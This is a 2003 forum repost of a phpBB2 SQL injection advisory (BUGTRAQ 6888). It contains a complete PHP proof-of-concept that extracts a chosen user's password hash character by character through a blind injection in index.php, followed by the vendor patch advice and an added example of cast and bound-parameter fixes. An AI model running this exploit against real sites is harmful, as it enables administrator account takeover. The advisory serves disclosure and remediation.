
[Repost] phpBB2 SQL injection vulnerability

Posted: 2003-02-28 11:04
majimmy
Saw this on a mainland cracking forum =..=

http://bbs.netxeyes.org/cgi-bin/bbs3000 ... 22&id=tech


Release date: 2003-02-19
Updated: 2003-02-27

Affected systems:
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
Unaffected systems:
phpBB Group phpBB 2.0.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 6888

phpBB is a popular open-source bulletin board (BBS) system.

Some phpBB2 scripts do not adequately filter user-supplied input. A remote attacker can exploit this to perform unauthorized operations against the database and obtain sensitive system information.

Because some phpBB2 scripts lack sufficient checks on user input, an attacker can submit crafted SQL that alters the logic of the original phpBB2 query, allowing unauthorized modification of the database and possibly entry into the application as a phpBB2 administrator.

<* Source: David Zentner (david@cgishield.com)

Link: http://www.cgishield.com/?target=advisory&id=8
*>

Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

David Zentner (david@cgishield.com) provided the following test method:

<?php 

########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker 
########## David@cgishield.com 


// To use this program, simply upload it to a php enabled webserver, and execute 
// If php times out before the whole password hash is determined, 
// adjust the maximum script execution time in php.ini 
// Also, replace following with correct values: 

$server="192.168.1.100"; 
$script="/phpbb2/index.php"; 
$the_userid_to_hack="2"; 


// don't change this 
$data_to_match="In total there are <b>0</b> users online"; 

// candidate hex digits of the MD5 hash, expressed as MySQL char() calls
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar['a']="char(97)";
$checkchar['b']="char(98)";
$checkchar['c']="char(99)";
$checkchar['d']="char(100)";
$checkchar['e']="char(101)";
$checkchar['f']="char(102)";

// one position of the 32-character hash per outer iteration; the response page
// (matching $data_to_match or not) is the only information used
for($i=1;$i<33;$i++){
    foreach ($checkchar as $i2 => $i2val){
        $vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid(user_password,$i,1)=$i2val/*";
        $data=sendToHost($server,'post',$script,$vars);
        if (stripos($data,$data_to_match) !== false){
            //echo("<b>$i2</b>");
        }
        else{echo("<br>$i= $i2"); flush();break;}
    }
}


// minimal HTTP/1.1 request over a raw socket; returns the whole response as a string
function sendToHost($host,$method,$path,$data,$useragent=1)
{
    $buf = '';
    $method = strtoupper($method);
    $fp = fsockopen($host,80);
    if (!$fp) { return $buf; }
    fputs($fp, "$method $path HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    if ($useragent)
        fputs($fp, "User-Agent: Mozilla\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    if ($method == 'POST')
        fputs($fp, $data);
    while (!feof($fp))
        $buf .= fgets($fp,128);
    fclose($fp);
    for($slow=0;$slow<100;$slow++){}   // crude busy-wait kept from the original

    return $buf;
}

?> 

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

phpBB Group
-----------
The vendor has released an upgrade that fixes this security issue. Please download it from the vendor's home page and upgrade to phpBB 2.0.3 or later:

http://www.phpbb.com/downloads.php

http://www.phpbb.com/
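
The advisory says the root cause is a script that pastes a request parameter into SQL without checking it, and the PoC above turns that into a one-character-per-request oracle. The following PHP is an added illustration, not phpBB's source and not part of the reposted advisory: it models the vulnerable request-handling shape with a hypothetical function, then shows two hardened forms (casting an identifier parameter to an integer, and binding it with PDO). The table and column names mirror the PoC; the query shapes, function names and the in-memory SQLite setup are assumptions made for the example.

```php
<?php
// Added example (not phpBB code): unsanitized integer parameter vs. two fixes.

// Vulnerable shape: the raw request value becomes part of the SQL text, so a
// value like "1 or user_id=2 and mid(user_password,1,1)=char(48)/*" rewrites
// the WHERE clause and the page's behaviour then depends on a hash character.
function build_forum_query_vulnerable(string $forum_id): string
{
    return "SELECT forum_name FROM phpbb_forums WHERE forum_id = $forum_id";
}

// Hardened shape 1: an identifier is an integer, so cast it before it reaches
// the SQL string. PHP keeps only the leading integer of the string (here 1),
// and the injected clause never reaches the database.
function build_forum_query_cast(string $forum_id): string
{
    $id = (int) $forum_id;
    return "SELECT forum_name FROM phpbb_forums WHERE forum_id = $id";
}

// Hardened shape 2: reject anything that is not a plain digit string, then
// bind the value as a parameter so data and SQL text are never mixed.
// Returns the forum name, or null when the input is rejected or not found.
function fetch_forum_name(PDO $pdo, string $forum_id): ?string
{
    if (!ctype_digit($forum_id)) {
        return null;  // fail closed before touching the database
    }
    $stmt = $pdo->prepare('SELECT forum_name FROM phpbb_forums WHERE forum_id = :id');
    $stmt->bindValue(':id', (int) $forum_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['forum_name'];
}

// Constructed demo data: an in-memory SQLite table standing in for the forum DB.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE phpbb_forums (forum_id INTEGER PRIMARY KEY, forum_name TEXT)');
$pdo->exec("INSERT INTO phpbb_forums VALUES (1, 'General')");

$hostile = '1 or user_id=2 and mid(user_password,1,1)=char(48)/*';  // the PoC's value, decoded

echo build_forum_query_vulnerable($hostile), "\n";  // WHERE clause has been rewritten
echo build_forum_query_cast($hostile), "\n";        // ... WHERE forum_id = 1
var_dump(fetch_forum_name($pdo, '1'));              // string(7) "General"
var_dump(fetch_forum_name($pdo, $hostile));         // NULL: rejected by ctype_digit()
```

The integer cast is the smaller change and is enough for numeric identifiers; the bound-parameter form is the one to standardize on, because it also covers string parameters where a cast is not available. Logging the rejected values from the `ctype_digit()` branch gives a cheap detection signal for probing of this kind.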

Posted: 2003-02-28 15:45
HeartIcy
http://www.cnns.net You'd better visit it often.